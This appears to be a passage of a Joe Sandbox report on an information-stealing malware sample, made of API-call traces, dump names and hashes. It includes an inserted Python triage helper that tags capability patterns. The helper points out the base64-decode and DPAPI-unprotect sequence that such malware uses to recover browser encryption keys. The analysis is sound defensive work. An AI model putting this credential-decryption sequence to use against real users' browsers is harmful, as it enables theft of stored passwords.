                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0042A3D0,000000FF), ref: 00422B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00422B96
                          • GetLocalTime.KERNEL32(?,?,00000000,0042A3D0,000000FF), ref: 00422BA2
                          • wsprintfA.USER32 ref: 00422BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 1187c665280c0081dca809d70cdac0b9e14ddbc1924146aa472259be47c606b7
                          • Instruction ID: 8c34349a47f058d6690e60c1733dac4b139ae13e761a6dd5b4e63d16ae77d0dd
                          • Opcode Fuzzy Hash: 1187c665280c0081dca809d70cdac0b9e14ddbc1924146aa472259be47c606b7
                          • Instruction Fuzzy Hash: A10140B2904628ABCB149BD9DD45FBEB7BDFB4CB11F00011AFA45A2290E7B85940C7B5
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B61
                          • LocalFree.KERNEL32 ref: 00409B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                          • Instruction ID: fdb19b52b522e7fb6258fb386c859728d3eb4189d8c812c623f7d3b132898295
                          • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                          • Instruction Fuzzy Hash: 89F0BD703443126BE7305F65AC49F577BA9EF04B61F240515FA45EA2D0D7B49C40CAA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *EU$6g{z$l{
                          • API String ID: 0-815813904
                          • Opcode ID: f310adea1e539dd68d988248300f274b4193488007c88f08e4466cb4717efa0e
                          • Instruction ID: 910029a2e33147f37f9c087708718c5cfb7c3b9adfdbe4dee189c75088773b13
                          • Opcode Fuzzy Hash: f310adea1e539dd68d988248300f274b4193488007c88f08e4466cb4717efa0e
                          • Instruction Fuzzy Hash: 73B22AF3A0C2009FE304AE2DEC4567AFBE9EF94720F16853DEAC4C7744EA3558458696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A?-$D<yw$hl
                          • API String ID: 0-600232951
                          • Opcode ID: 23440d4057288ae928e9aa07ad1477357785b19578f6e6047c5de917041e7e24
                          • Instruction ID: a052723cc1cce676d3219ca819738b5f8fb0ac248f8fcb5981151846a9ffe830
                          • Opcode Fuzzy Hash: 23440d4057288ae928e9aa07ad1477357785b19578f6e6047c5de917041e7e24
                          • Instruction Fuzzy Hash: 8BB22BF360C204AFE304AE2DEC8567BB7E9EBD4720F16863DE6C5C3744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $L^o$EX4$SYFY
                          • API String ID: 0-2102620248
                          • Opcode ID: 9fe9d4ffa40eddab95351e155a1f6e4f883fb1efccdf47dd69477edb550ccbe1
                          • Instruction ID: c7d12ae53358c8e48edcdbfb550e742497e7d0b4ddb3de46e284c7e7629d99d7
                          • Opcode Fuzzy Hash: 9fe9d4ffa40eddab95351e155a1f6e4f883fb1efccdf47dd69477edb550ccbe1
                          • Instruction Fuzzy Hash: B8B259F3A0C2049FD3046F2DEC85A7ABBE9EF94720F1A493DEAC4C7744E67558018696
                          APIs
                          • CoCreateInstance.COMBASE(0042B110,00000000,00000001,0042B100,?), ref: 0041CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0041CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0041CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: 356407dd27f615bd9d7e1c9fd377e8c2577ed93a8701771f82fb0a3cc92fc221
                          • Instruction ID: 1b90be6a62ff22c9a4e24909d29a5cecf1084cb0eae29e4f46ca5412203977ef
                          • Opcode Fuzzy Hash: 356407dd27f615bd9d7e1c9fd377e8c2577ed93a8701771f82fb0a3cc92fc221
                          • Instruction Fuzzy Hash: D4316471A40624AFD710DB94DC82FEAB7B9DB88B10F104185FA14EB2D0D7B4AE44CBE4
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409BB3
                          • LocalFree.KERNEL32(?), ref: 00409BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: e6970078d33f0c9cac3d8d233968411e51d5df21ceb30eb19583022ed57f2fb8
                          • Instruction ID: 53b88ad36b60bd237d2e400e03c78e8b02b6d7bc2306e19c9fd1f58beb86f7b1
                          • Opcode Fuzzy Hash: e6970078d33f0c9cac3d8d233968411e51d5df21ceb30eb19583022ed57f2fb8
                          • Instruction Fuzzy Hash: 20011DB5A41309ABE710DBA4DC45FABB779EB44B00F104559FA04AB381E7B4AE008BE5
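Added triage example, not part of the Joe Sandbox report and not Stealc's own code: a small Python helper that parses the "APIs" lines of the function blocks above (the only input is an excerpt copied from this page, embedded as a constructed string), names the CRYPT_STRING_* flag values those calls pass, and tags each block with the capability its call sequence implies. The capability names and the adjacency heuristic are the example's own assumptions. What it surfaces from the lines on this page: the function at 00409B3B is the two-call CryptStringToBinaryA idiom (dwFlags = 1 = CRYPT_STRING_BASE64, NULL output buffer to query the size, LocalAlloc, decode), the next function in address order at 00409B9F wraps CryptUnprotectData, and the function at 004240CD encodes with 0x40000001 = CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, i.e. single-line base64 of the kind used for outbound data. Base64 decode followed by DPAPI unprotect is the sequence needed to recover a base64-stored DPAPI blob such as a Chromium Local State encrypted_key; the report itself does not show which input reaches these functions, so treat the chain as a lead to confirm in the dump, not as a finding. Slots the sandbox renders as "?" are kept as unknown rather than guessed.

```python
import re
from typing import List, Set, Tuple

# Constructed input: the "APIs" sections of six function blocks copied
# from this report (Analysis ID 1558871); nothing else is fed in.
REPORT_API_LINES = """
APIs
• lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0040EA76
• CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040EA7E
• lstrcat.KERNEL32(0042CFEC,0042CFEC), ref: 0040EB27
• lstrcat.KERNEL32(0042CFEC,0042CFEC), ref: 0040EB49
APIs
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240CD
• GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240DC
• RtlAllocateHeap.NTDLL(00000000), ref: 004240E3
• CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00424113
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0042A3D0,000000FF), ref: 00422B8F
• RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00422B96
• GetLocalTime.KERNEL32(?,?,00000000,0042A3D0,000000FF), ref: 00422BA2
• wsprintfA.USER32 ref: 00422BCE
APIs
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B3B
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00409B4A
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B61
• LocalFree.KERNEL32 ref: 00409B70
APIs
• CoCreateInstance.COMBASE(0042B110,00000000,00000001,0042B100,?), ref: 0041CB06
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0041CB46
• lstrcpyn.KERNEL32(?,?,00000104), ref: 0041CBC9
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B9F
• LocalAlloc.KERNEL32(00000040,?), ref: 00409BB3
• LocalFree.KERNEL32(?), ref: 00409BD7
"""

# "• Name.MODULE(args), ref: ADDR"; the argument list is optional in the report.
API_RE = re.compile(r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# CRYPT_STRING_* values from wincrypt.h: low bits select the format, high bits modify it.
CRYPT_STRING_FORMATS = {0x1: "CRYPT_STRING_BASE64", 0x4: "CRYPT_STRING_HEX",
                        0x6: "CRYPT_STRING_BASE64_ANY", 0x7: "CRYPT_STRING_ANY",
                        0xC: "CRYPT_STRING_HEXRAW"}
CRYPT_STRING_MODIFIERS = {0x40000000: "CRYPT_STRING_NOCRLF", 0x80000000: "CRYPT_STRING_NOCR",
                          0x20000000: "CRYPT_STRING_STRICT"}
ALLOCATORS = {"LocalAlloc", "RtlAllocateHeap", "HeapAlloc", "VirtualAlloc"}


def parse_blocks(text: str) -> List[List[dict]]:
    """One list of calls per 'APIs' header; '?' arguments become None, hex becomes int."""
    blocks: List[List[dict]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
            continue
        m = API_RE.match(line)
        if not m or not blocks:
            continue
        raw = m.group("args")
        args = [] if raw is None else [None if a.strip() == "?" else int(a, 16)
                                       for a in raw.split(",")]
        blocks[-1].append({"name": m.group("name"), "module": m.group("module"),
                           "args": args, "ref": int(m.group("ref"), 16)})
    return blocks


def decode_crypt_string_flags(flags: int) -> List[str]:
    """Name the dwFlags value passed to CryptStringToBinary / CryptBinaryToString."""
    fmt = flags & 0xFFFF
    return ([CRYPT_STRING_FORMATS.get(fmt, f"format_0x{fmt:x}")]
            + [n for bit, n in CRYPT_STRING_MODIFIERS.items() if flags & bit])


def classify(block: List[dict]) -> Set[str]:
    """Tag a function block with the capability its call sequence implies (heuristic)."""
    tags: Set[str] = set()
    names = [c["name"] for c in block]
    for i, call in enumerate(block):
        n, args = call["name"], call["args"]
        if n in ("CryptStringToBinaryA", "CryptBinaryToStringA"):
            flags = args[2] if len(args) > 2 else None  # dwFlags is the third parameter
            fmt = decode_crypt_string_flags(flags)[0] if flags is not None else "unknown-format"
            tags.add(("decode:" if n.startswith("CryptString") else "encode:") + fmt)
            # Size-query idiom: NULL output buffer (fourth parameter), allocate, call again.
            later = names[i + 1:]
            if len(args) > 3 and args[3] == 0 and n in later and ALLOCATORS & set(later):
                tags.add("size-query-then-alloc")
        elif n == "CryptUnprotectData":
            tags.add("dpapi-unprotect")
        elif n == "CoCreateInstance":
            tags.add("com-instantiation")
    if "GetLocalTime" in names and "wsprintfA" in names:
        tags.add("timestamp-format")
    if "CreateToolhelp32Snapshot" in names and "Process32Next" in names:
        tags.add("process-enumeration")
    return tags


def adjacent_chains(blocks: List[List[dict]], first: str, second: str) -> List[Tuple[int, int]]:
    """(addr, addr) pairs where a block tagged `first` directly precedes one tagged `second`."""
    ordered = sorted((b for b in blocks if b), key=lambda b: b[0]["ref"])
    return [(a[0]["ref"], b[0]["ref"]) for a, b in zip(ordered, ordered[1:])
            if first in classify(a) and second in classify(b)]


if __name__ == "__main__":
    parsed = parse_blocks(REPORT_API_LINES)
    for blk in sorted(parsed, key=lambda b: b[0]["ref"]):
        print(f"{blk[0]['ref']:08X}: {sorted(classify(blk))}")
    print("base64 decode -> DPAPI unprotect:", [f"{a:08X}->{b:08X}" for a, b in
          adjacent_chains(parsed, "decode:CRYPT_STRING_BASE64", "dpapi-unprotect")])
```

The rules are deliberately narrow: a block is tagged only when the call and, where the sandbox captured it, the flag value are both present, so a "?" in the dwFlags slot (as at 0040EA7E) yields "decode:unknown-format" instead of a guess. Extending the same table to other CRYPT32 and DPAPI calls (CryptProtectData, CryptDecrypt, BCryptDecrypt) is the natural next step for a larger report.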
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "=J$r_u
                          • API String ID: 0-3738298112
                          • Opcode ID: 0b7f2080e6ced17c48b05accd21a7f6ba2798568b7a73684cb11416af39caa36
                          • Instruction ID: f14a744e36861655009f67242b01a65be1e7f11059f63c9ff00caa1636315dac
                          • Opcode Fuzzy Hash: 0b7f2080e6ced17c48b05accd21a7f6ba2798568b7a73684cb11416af39caa36
                          • Instruction Fuzzy Hash: 7BB2E7F360C2049FE3146E29EC8577AFBE9EF94320F1A493DEAC4C7744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Sw{
                          • API String ID: 0-2793961255
                          • Opcode ID: 833e90220e612575a2dc238ac7a7f3cde4313dd27e0a0581998ff1c339d9adac
                          • Instruction ID: d7ea1a8ce041e6372121e36d392946d65da9e54817856c168181f65d1b8397c6
                          • Opcode Fuzzy Hash: 833e90220e612575a2dc238ac7a7f3cde4313dd27e0a0581998ff1c339d9adac
                          • Instruction Fuzzy Hash: 905129F3A085109FE304AE6DEC5577AB7DAEBE8321F1A493EE5C4C3344E97848058792
                          Strings
                          Memory Dump Source
